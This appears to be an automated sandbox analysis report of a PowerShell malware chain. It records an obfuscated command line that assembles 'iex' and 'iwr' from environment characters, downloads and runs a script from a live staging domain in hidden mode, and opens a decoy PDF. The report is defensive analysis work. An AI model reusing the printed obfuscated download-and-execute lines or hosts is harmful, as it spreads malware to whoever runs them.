                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.849705107.161.23.1504433020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-12-19 10:56:20 UTC173OUTGET /mk/neat.txt HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: www.al-rasikh.com
                                                                Connection: Keep-Alive
                                                                2024-12-19 10:56:20 UTC387INHTTP/1.1 200 OK
                                                                Connection: close
                                                                content-type: text/plain
                                                                last-modified: Wed, 14 Feb 2024 09:47:20 GMT
                                                                accept-ranges: bytes
                                                                content-length: 841
                                                                date: Thu, 19 Dec 2024 10:56:20 GMT
                                                                server: LiteSpeed
                                                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                2024-12-19 10:56:20 UTC841INData Raw: 70 6f 77 65 72 73 68 65 6c 6c 20 2d 77 69 6e 20 68 69 64 64 65 6e 20 24 74 38 69 73 70 6b 3d 69 65 78 28 24 28 27 5b 45 6e 76 69 72 6f 6e 6d 65 6e 74 5d 3a 3a 47 65 74 45 77 6e 61 73 27 27 27 2e 52 65 70 6c 61 63 65 28 27 77 6e 61 27 2c 27 6e 76 69 72 6f 6e 6d 65 6e 74 56 61 72 69 61 62 6c 65 28 27 27 70 75 62 6c 69 63 27 27 29 20 2b 20 27 27 5c 5c 68 71 70 6f 71 77 2e 76 62 27 29 29 29 3b 24 66 6c 6f 6c 3d 69 65 78 28 24 28 27 5b 45 6e 76 69 72 6f 6e 6d 65 6e 74 5d 3a 3a 47 65 74 45 77 6e 61 73 27 27 27 2e 52 65 70 6c 61 63 65 28 27 77 6e 61 27 2c 27 6e 76 69 72 6f 6e 6d 65 6e 74 56 61 72 69 61 62 6c 65 28 27 27 70 75 62 6c 69 63 27 27 29 20 2b 20 27 27 5c 5c 64 6d 62 2e 76 62 27 29 29 29 3b 66 75 6e 63 74 69 6f 6e 20 67 65 74 69 74 28 5b 73 74 72 69 6e
                                                                Data Ascii: powershell -win hidden $t8ispk=iex($('[Environment]::GetEwnas'''.Replace('wna','nvironmentVariable(''public'') + ''\\hqpoqw.vb')));$flol=iex($('[Environment]::GetEwnas'''.Replace('wna','nvironmentVariable(''public'') + ''\\dmb.vb')));function getit([strin


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.849706107.161.23.1504433020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-12-19 10:56:23 UTC127OUTGET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
                                                                Host: www.astenterprises.com.pk
                                                                Connection: Keep-Alive
                                                                2024-12-19 10:56:24 UTC217INHTTP/1.1 200 OK
                                                                Connection: close
                                                                content-type: application/pdf
                                                                last-modified: Sun, 28 Jan 2024 19:03:01 GMT
                                                                accept-ranges: bytes
                                                                content-length: 871324
                                                                date: Thu, 19 Dec 2024 10:56:23 GMT
                                                                server: LiteSpeed
                                                                2024-12-19 10:56:24 UTC16384INData Raw: 25 50 44 46 2d 31 2e 37 0d 25 e2 e3 cf d3 0d 0a 31 32 39 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 36 35 33 32 34 38 2f 4f 20 31 33 31 2f 45 20 38 36 34 32 33 2f 4e 20 35 2f 54 20 36 35 32 37 37 30 2f 48 20 5b 20 34 39 37 20 32 37 33 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 31 34 33 20 30 20 6f 62 6a 0d 3c 3c 2f 44 65 63 6f 64 65 50 61 72 6d 73 3c 3c 2f 43 6f 6c 75 6d 6e 73 20 35 2f 50 72 65 64 69 63 74 6f 72 20 31 32 3e 3e 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 49 44 5b 3c 45 33 39 35 37 36 43 34 37 35 41 42 45 43 34 33 41 31 38 37 42 39 44 37 38 30 43 34 37 35 37 44 3e 3c 36 34 31 43 41 32 38 37 30 33 43 34 42 31 34 34 38 38 36 46 33 34 32 30 32 33 42 33 34 35
                                                                Data Ascii: %PDF-1.7%129 0 obj<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>endobj 143 0 obj<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B345
                                                                2024-12-19 10:56:24 UTC16384INData Raw: 4b 4b 4b f4 b8 e9 cf 0b a9 9e 76 d3 14 23 28 9c 68 17 25 44 45 32 9b e4 30 63 de da 74 55 51 91 17 0f 23 b9 74 42 79 99 8f 15 a5 ab 6a 2d 56 56 3a 41 91 9b da fa 0f ac 3d b1 66 fa f2 fe 83 1f ae 7f f5 f4 91 8d 1b 8f 1c 79 71 63 43 8e f6 13 91 4c 3d ba a0 bb 30 72 b9 50 28 fc b1 6b ef 29 f2 46 e1 b5 4f 6f 93 56 b2 fc d6 f7 7f 8a 68 bc 82 40 bb 8f 18 d3 88 9b 23 ac 5b 1b 5f f9 98 a0 8d 65 0b c6 04 6d 34 17 e3 49 b1 4b 9a 05 db b4 aa db c4 4d 74 17 dd e7 12 8f 8a 44 05 59 a2 82 2a 11 83 92 4b 9a 93 5d 8d ef 13 90 04 7a cd 8f 5c 75 ce 6c 14 6e da 96 03 d7 98 03 57 b7 03 57 cc 96 1d e6 60 1c 43 9c 83 be 88 21 d9 a6 a7 5a e2 b6 dc dc 96 44 12 92 2d 51 29 ac 9f 21 19 b2 05 46 a9 ba 6a 74 47 9c 0b 07 a3 b5 30 cb 0f c6 7a be 33 90 c3 d2 e3 5c 51 1b 63 53 65 5b 92
                                                                Data Ascii: KKKv#(h%DE20ctUQ#tByj-VV:A=fyqcCL=0rP(k)FOoVh@#[_em4IKMtDY*K]z\ulnWW`C!ZD-Q)!FjtG0z3\QcSe[
                                                                2024-12-19 10:56:24 UTC16384INData Raw: ed 2b 5d eb ed eb 5d 1c 2a ad 66 a8 50 9d 10 15 d2 5d 0e 75 89 22 17 a4 6d 26 47 51 ca 35 42 88 c3 b3 09 47 4c 80 b6 92 8c b5 95 6c 19 f8 f6 d9 f7 91 fa dc ad 57 af 4d dc fe d5 c9 be 57 4e 0e ee ea 3b c9 fa 50 6a f7 f6 89 bf 8d 5f bc f5 0d 14 41 ee 0b e7 2f fc f9 ec f9 73 e4 27 f5 4d 74 70 75 84 2a 2f 13 41 57 a8 0a f5 4a f8 01 fc 45 dc 8a b9 5c f4 78 94 ad 8d 4e 93 e2 35 99 40 a6 66 61 cd e6 68 7f d4 d9 1c 6c 36 96 05 97 19 ab 9d 6b a5 62 b0 68 74 3a 37 49 1d b8 3b b8 c9 18 89 5e f2 5f d5 ae 86 2e 45 6e f8 6f 44 ae 47 27 a3 6a 9c 6b c4 8d 81 59 5c 33 7e 98 5b 86 d7 e0 bf 8b b7 6a 26 b0 a8 c8 36 35 1c 06 a3 55 c3 b2 c8 c8 7a 15 50 ba 05 28 7d 0a a8 70 41 4f 8c 0a 08 0b 79 a1 5d d8 29 70 51 8a 55 94 22 26 0c 4f 8e e5 45 80 4b d0 2a 9f c1 70 69 f1 31 e5 4b
                                                                Data Ascii: +]]*fP]u"m&GQ5BGLlWMWN;Pj_A/s'Mtpu*/AWJE\xN5@fahl6kbht:7I;^_.EnoDG'jkY\3~[j&65UzP(}pAOy])pQU"&OEK*pi1K
                                                                2024-12-19 10:56:24 UTC16384INData Raw: f0 0a e0 02 58 65 b0 11 40 67 2b c0 87 c0 35 fc 13 79 8d 58 c0 10 a0 b2 bf 79 e8 c6 67 1f 79 46 9e e7 3a d8 5f d9 fb 64 23 66 fc 2f ec 03 c9 1f 62 57 13 fc 67 f6 ae e4 2b e0 38 78 85 bd e7 c5 39 c9 b5 22 4f 50 27 22 4e 29 e0 34 f2 f7 b1 77 e6 ba a3 bc 9e 6b c7 f1 1c 8f 19 36 0d 64 81 41 60 0c 98 05 5a d8 25 d6 e5 3d c5 a3 68 64 89 ac e0 fd e7 cc 23 5f 4b 7e 8d bc aa 12 eb 19 6e 19 7b b1 00 75 61 8c dd 8f c2 83 39 a7 9f 33 98 65 9c f9 23 8a c2 18 a7 7f 0b 4f 18 e3 97 bf 81 27 8c f1 b3 13 f0 84 31 9e 3b 06 4f 18 e3 a9 67 e0 09 63 8c 8e c1 13 c6 18 1c 81 07 e3 b3 97 df ea fe 31 cf 0c 3e 4b f5 5c 98 cd 60 96 66 30 4b 33 98 a5 19 12 64 33 e2 47 6e 07 c5 d8 fe e4 f5 f4 60 c6 ce 5a e6 e6 1e ee 2c 52 e7 6d ea ec a7 ce ab d4 99 a4 ce 71 ea 9c a0 ce 1e ea 1c a2 8e
                                                                Data Ascii: Xe@g+5yXygyF:_d#f/bWg+8x9"OP'"N)4wk6dA`Z%=hd#_K~n{ua93e#O'1;Ogc1>K\`f0K3d3Gn`Z,Rmq
                                                                2024-12-19 10:56:24 UTC16384INData Raw: e6 09 e6 76 33 e7 20 39 5e d7 78 5c 72 bd 06 f7 03 59 e9 3e 2d 95 8a b9 83 39 2b 4d 32 5a 61 cf 2e f3 cb 65 b2 fb 90 ac 63 6f ef a1 bc c6 ed 21 4b fd 91 c4 9b 86 33 5f 20 23 19 ff 3c c6 9a 44 ce d9 ac df cc 33 8c 73 34 a2 45 46 69 ce e6 3f 28 cd de 50 6c 32 6a e3 d5 61 e7 b7 73 2e 74 1f 6e 92 02 3f 87 75 3e ab 77 4d 78 18 bd 03 a8 d6 fd 61 af b3 fc 7b d8 7b a4 de 55 9c d7 a9 e6 59 d6 e5 b0 3d 47 55 71 1d 1d 72 4c 4b 78 9a f1 b2 e8 9b 85 14 fa ab cc e1 7f 39 cc b7 27 ef f3 fd 27 a5 80 3b b0 98 fb 6c 8a 5f c2 7a ed 95 6e f6 ae 65 fd fd e1 32 d0 ea 73 44 1a 33 72 39 2b bf 97 89 de 11 fa 6f 0a 5b bd de d8 60 0f b9 87 b6 33 19 6b 86 de 8b cc ab 21 73 b6 38 e6 a3 f0 44 e0 c9 4d c6 c8 f5 fc c3 f3 7e 9c d4 55 63 44 7c 64 a1 5b 2c 23 9d 33 52 18 4c a7 ff e7 ac 41
                                                                Data Ascii: v3 9^x\rY>-9+M2Za.eco!K3_ #<D3s4EFi?(Pl2jas.tn?u>wMxa{{UY=GUqrLKx9'';l_zne2sD3r9+o[`3k!s8DM~UcD|d[,#3RLA
                                                                2024-12-19 10:56:24 UTC16384INData Raw: 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 ff db 00 43 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 00 3f 00 c0 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66
                                                                Data Ascii: C?"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdef
                                                                2024-12-19 10:56:24 UTC16384INData Raw: 42 63 f6 91 ac 1c 27 a7 50 cf 3e 4d fa d1 56 75 d0 ba c5 64 81 1a e6 4c e6 58 0c d5 26 8d 98 fa 33 16 57 24 7e ce 0d 4d b4 4e e0 f1 9d a4 83 d6 ad f8 85 85 a3 92 91 35 88 bd 03 2b 42 68 57 83 ca 8b eb 0a 26 10 84 26 17 0f 24 e1 b0 a4 2a f0 34 91 e7 9e c9 ab bc 37 82 b3 3c e6 68 87 ab e0 87 8c 95 38 94 3f 89 f6 74 69 2e 63 10 88 29 1a de d4 82 08 7f 0f d5 a4 1b 8d 61 79 c7 6f 9d e0 37 4a 89 38 17 e9 e4 95 dd 0d 7d 4f b3 30 56 d1 0f 1c 57 76 69 e3 4b 9b 0b d3 f3 e3 1a d9 e4 26 c2 70 53 39 67 76 0d 9f 1c f4 20 16 3a db 45 1d c7 b7 5c d1 9f 30 3d 72 3f aa ba 3c 22 fd 70 1b 45 03 b3 43 32 bf d8 82 1f e4 4f 1d 0f 11 35 f9 12 53 6d 59 4a 7b 27 f0 ef 43 32 e2 85 41 65 c5 a3 51 82 27 2e 9e 0e 45 46 7d 6b 32 7c 43 4a 16 e0 ee b0 58 c2 df 44 9e b6 f4 11 a9 53 55 b4
                                                                Data Ascii: Bc'P>MVudLX&3W$~MN5+BhW&&$*47<h8?ti.c)ayo7J8}O0VWviK&pS9gv :E\0=r?<"pEC2O5SmYJ{'C2AeQ'.EF}k2|CJXDSU
                                                                2024-12-19 10:56:24 UTC16384INData Raw: 74 f9 ed f0 78 28 61 e2 0c 41 23 be 47 c9 59 95 29 28 4a 96 a2 02 52 09 24 ec 00 dc c5 44 80 24 ab 2e a9 da ee 77 e0 9a 05 5c 51 a7 2a 92 c8 9b b9 49 6d 4e a7 8a f6 e9 c5 d7 a7 b6 18 47 ea ce ed 40 04 cf 01 f3 af 70 ac 7e 19 60 04 e7 fb fc 28 5c f7 6a 0c bd 93 ae 4b d1 0d 4e 58 cd 4c 14 a5 08 0f 37 7b ab 41 a5 ef bf 9e dc af 16 60 b0 e3 3d cc 6d 0b 4d 78 5b f6 55 58 87 e9 b5 ae 24 43 a0 f2 93 9f 94 3c 96 c3 d2 aa 72 d5 79 26 67 a5 16 16 cb e8 4a d2 52 6e 2c a1 71 af 3b f2 f6 c1 ec 38 6e 2d 22 14 58 f0 f1 23 fd e5 9c 2c 8c 41 4d 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 fc 3b 1b 6f 63 68 e3 ac 79 1f 65 d1 71 36 91 2b c0 4f f8 ab 4a e2 aa 9c d4 9c 85 04 4d ad 6f 39 c0 13 2e 16 4e a7 84 7e e7 98 f1 f5 eb 18
                                                                Data Ascii: tx(aA#GY)(JR$D$.w\Q*ImNG@p~`(\jKNXL7{A`=mMx[UX$C<ry&gJRn,q;8n-"X#,AM H"AD$ H"AD$ H";ochyeq6+OJMo9.N~
                                                                2024-12-19 10:56:24 UTC16384INData Raw: e4 47 fa 93 f1 82 27 78 df fe 44 7f a9 3f 18 22 fa 04 1d 41 04 75 06 f0 45 fb 04 48 22 41 12 08 90 44 82 24 11 20 89 04 51 dc 55 50 99 a6 50 a7 e7 25 10 5c 7d 96 1c 5b 69 4e a7 89 29 24 73 07 d9 ee de 08 bc 08 cf be dc 5d a0 f0 56 33 a8 d2 a8 18 6e a5 31 26 cc cb a8 6d 6d b0 f2 92 52 95 90 08 e1 04 6d ee 1e b8 22 a2 7f c4 57 b5 07 f4 9d 57 ea d3 1f 82 08 9f e2 2b da 83 fa 4e ab f5 69 8f c1 04 4f f1 15 ed 41 fd 27 55 fa b4 c7 e0 82 27 f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 16 5a 8b ff 00 10 4e d3 b5 39 e6 a5 1c c2 d5 54 25 c5 24 15 7c 9e 60 68 4d b7 29 02 08 a5 d8 bb b7 0f 69 7c 3e d3 2f cb e1 ba a3 a5 c4 05 10 18 7c f2 3a 58 03 b5 fa 0f 3e a4 55 df f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 13 fc 45 7b 50 7f 49 d5 7e ad 31 f8 20 89 fe 22 bd a8 3f a4 ea bf 56 98 fc
                                                                Data Ascii: G'xD?"AuEH"AD$ QUPP%\}[iN)$s]V3n1&mmRm"WW+NiOA'U'ZcAZN9T%$|`hM)i|>/|:X>UZcAE{PI~1 "?V
                                                                2024-12-19 10:56:24 UTC16384INData Raw: 65 4a 6b 65 99 59 69 a6 d1 2e 92 09 42 56 9d 76 36 de de ee 91 3f a8 5c e0 5f 5b 77 e3 3c 3f c5 d2 61 a4 01 53 f1 61 dd 5d 12 d9 1d 42 6b 0c 37 40 71 c6 94 df 77 c2 a0 a5 a4 83 70 01 dc f3 3e be 57 b4 31 5f be e0 40 10 00 be 7d bd b9 8a 65 3d 97 15 d8 04 b8 5c 83 c0 88 f9 a2 a4 2b 1d 8b 70 55 46 a6 cd 41 29 97 42 d0 b0 b5 5b 80 5f 5b f5 d6 e0 ef 6f 2d 74 8e 37 10 b5 e5 c3 3c b9 5b ad bc 99 96 36 33 b1 a6 69 37 fc a9 0a 7b 33 ca 4a 38 c3 12 33 68 6e 4d 01 21 68 4a 85 ac 39 1b 5b 71 ef bd b4 b4 0e 21 79 fb e4 89 91 a0 a1 1c ce 53 6f 85 43 bf ac 34 41 f2 de 4d 55 e1 86 b2 e5 9c 31 26 d4 b4 84 cb 69 03 84 2c 85 01 73 a7 4d 2d e0 7a f2 8e e2 62 17 d2 c3 f7 3f ee aa b0 cb 9a 6f 47 0d 3c 8c a4 4d 57 1e 62 e5 7c 8e 39 a1 2a 4a 69 e6 94 e7 00 40 5f 12 7f 7a da eb
                                                                Data Ascii: eJkeYi.BVv6?\_[w<?aSa]Bk7@qwp>W1_@}e=\+pUFA)B[_[o-t7<[63i7{3J83hnM!hJ9[q!ySoC4AMU1&i,sM-zb?oG<MWb|9*Ji@_z


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:1
                                                                Start time:05:56:14
                                                                Start date:19/12/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${t8ispk} = $PSHOME;${*wff6sn.} = ${t8ispk}[+52 -53 +1] + ${t8ispk}[-11 +2] + 'A' + ${t8ispk}[-66 +55];${wna.} = $([TYPE]${*wff6sn.});${*.hqpoqw.} = ${wna.}::ToString(+79 -1 -5)+${wna.}::ToString(+79 -1 -5 -4)+${wna.}::ToString(+79 +30 -10 +21);&(${*.hqpoqw.})(&(${*.hqpoqw.})(${t8ispk}[+52 -53 +1]+'u'+${t8ispk}[-66 +55]+${t8ispk}[-61 +55]+' https://www.al-rasikh.com/mk/neat.txt -UseBasicParsing'))
                                                                Imagebase:0x7ff6cb6b0000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:05:56:14
                                                                Start date:19/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6ee680000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:3
                                                                Start time:05:56:19
                                                                Start date:19/12/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\hqpoqw.vbs'"
                                                                Imagebase:0x7ff6cb6b0000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:5
                                                                Start time:05:56:24
                                                                Start date:19/12/2024
                                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
                                                                Imagebase:0x7ff6e8200000
                                                                File size:5'641'176 bytes
                                                                MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:6
                                                                Start time:05:56:25
                                                                Start date:19/12/2024
                                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                Imagebase:0x7ff79c940000
                                                                File size:3'581'912 bytes
                                                                MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:7
                                                                Start time:05:56:25
                                                                Start date:19/12/2024
                                                                Path:C:\Windows\System32\svchost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                Imagebase:0x7ff67e6d0000
                                                                File size:55'320 bytes
                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:8
                                                                Start time:05:56:26
                                                                Start date:19/12/2024
                                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1644,i,621958559739695551,17562873366467030147,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                Imagebase:0x7ff79c940000
                                                                File size:3'581'912 bytes
                                                                MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Reset < >
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1714417155.00007FFB4B080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B080000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffb4b080000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6P#
                                                                  • API String ID: 0-325432434
                                                                  • Opcode ID: cbc1c2bad50ecf775fe0ef7b31e1c006cbe66f4530eb7329733b1d9da2fe978f
                                                                  • Instruction ID: 41cddc046ef54f8fab3ce378dba5cbc1aad395370819eef360d6d13b12c6b8c1
                                                                  • Opcode Fuzzy Hash: cbc1c2bad50ecf775fe0ef7b31e1c006cbe66f4530eb7329733b1d9da2fe978f
                                                                  • Instruction Fuzzy Hash: 45D147B290EB890FEBA6EF78C8241B9BFA1EF45311B0944FED54DC71A3D918A905C351
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1714417155.00007FFB4B080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B080000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffb4b080000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7317dfd5ee7e2c08ca9f7116c6a36a7fbc11696581417320656c22304f707cc1
                                                                  • Instruction ID: 671a31214d31008ee925e47bdd5e72fc0d858b2bd7b3f432401be15fbcf17b17
                                                                  • Opcode Fuzzy Hash: 7317dfd5ee7e2c08ca9f7116c6a36a7fbc11696581417320656c22304f707cc1
                                                                  • Instruction Fuzzy Hash: 9DF129A290EBC60FEB96BA7899551747FD1EF62311B0840FFD189C72E3DD18AD068352
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1714417155.00007FFB4B080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B080000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffb4b080000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6b24cf19eb0869fb37a9fd224dba16ecbeaf44a2cdb458677e88d973283793aa
                                                                  • Instruction ID: d707bebd8b4396edaa59fef9a8eaee3d43f18361a2a264b741b66711a563f7ba
                                                                  • Opcode Fuzzy Hash: 6b24cf19eb0869fb37a9fd224dba16ecbeaf44a2cdb458677e88d973283793aa
                                                                  • Instruction Fuzzy Hash: B271D3A2A4D7C54FEB57AB7888615603FE0EF57221B0941FAC088CB1F3E55C9D4AC361
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1714417155.00007FFB4B080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B080000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffb4b080000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 27c916df14c756748a44a67e691bf32ff9fbbbf12c335ab6ccda4da4bb90112b
                                                                  • Instruction ID: 5651a34ba2bb1884c4dde8ccdbc5184317f987136dd38990a3439aa0929e0d9f
                                                                  • Opcode Fuzzy Hash: 27c916df14c756748a44a67e691bf32ff9fbbbf12c335ab6ccda4da4bb90112b
                                                                  • Instruction Fuzzy Hash: D931846160DB894FDF47DA38C9A0A243BE1EF66311B0941EAC189CB2B3D529ED45C751
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1714417155.00007FFB4B080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B080000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffb4b080000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9a6c96379da7154beccdd2ff5268525a890eea8d17a6ebabc2a1b9a8a6075862
                                                                  • Instruction ID: bcb70d7a1caae885610a268e4ed8812f3eabed5363adba8a2687d98430b53d5c
                                                                  • Opcode Fuzzy Hash: 9a6c96379da7154beccdd2ff5268525a890eea8d17a6ebabc2a1b9a8a6075862
                                                                  • Instruction Fuzzy Hash: 1E217BA2E0DB4A0FFBA5BE38D9511746AC2EFA5322B5850BAD14EC32E3DD18AC054241
                                                                  Memory Dump Source
